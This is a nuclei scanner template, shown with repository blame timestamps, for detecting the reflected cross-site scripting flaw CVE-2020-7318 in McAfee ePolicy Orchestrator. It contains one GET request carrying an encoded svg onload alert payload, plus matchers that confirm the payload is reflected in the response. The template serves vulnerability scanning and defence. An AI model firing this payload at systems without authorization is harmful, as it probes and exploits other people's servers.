nuclei-templates/http/cves/2020/CVE-2020-7318.yaml

57 lines
2.1 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-7318
2020-12-09 08:54:40 +00:00
info:
name: McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting
2020-12-09 08:54:40 +00:00
author: dwisiswant0
severity: medium
description: |
McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.
reference:
2020-12-09 08:54:40 +00:00
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
- https://kc.mcafee.com/corporate/index?page=content&id=SB10332
- https://nvd.nist.gov/vuln/detail/CVE-2020-7318
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions.
2023-09-06 12:22:36 +00:00
remediation: |
Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability.
reference:
- https://kc.mcafee.com/corporate/index?page=content&id=SB10332
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2020-7318
cwe-id: CWE-79
epss-score: 0.00065
epss-percentile: 0.27029
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: mcafee
product: epolicy_orchestrator
tags: cve,cve2020,xss,mcafee
2020-12-09 08:54:40 +00:00
http:
2021-01-10 22:39:54 +00:00
- raw:
2020-12-09 08:54:40 +00:00
- |
GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
2021-01-10 22:39:54 +00:00
Host: {{Hostname}}
2020-12-09 08:54:40 +00:00
Connection: close
2021-01-10 22:39:54 +00:00
2020-12-09 08:54:40 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: header
2020-12-09 08:54:40 +00:00
words:
- "text/html"
2023-07-11 19:49:27 +00:00
2020-12-09 08:54:40 +00:00
- type: word
2023-07-11 19:49:27 +00:00
part: body
2020-12-09 08:54:40 +00:00
words:
- "Policy Name"
- "'\"><svg/onload=alert(document.domain)>"
condition: and
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100faa284d4b06f356396d8eda1bbc7e0c575dee731484144ead94fb124061a10b90220765eff51eae247034142d964e680d1ea99d4eec6f0baf29b3d98e9ecdbec1f73:922c64590222798bb761d5b6d8e72950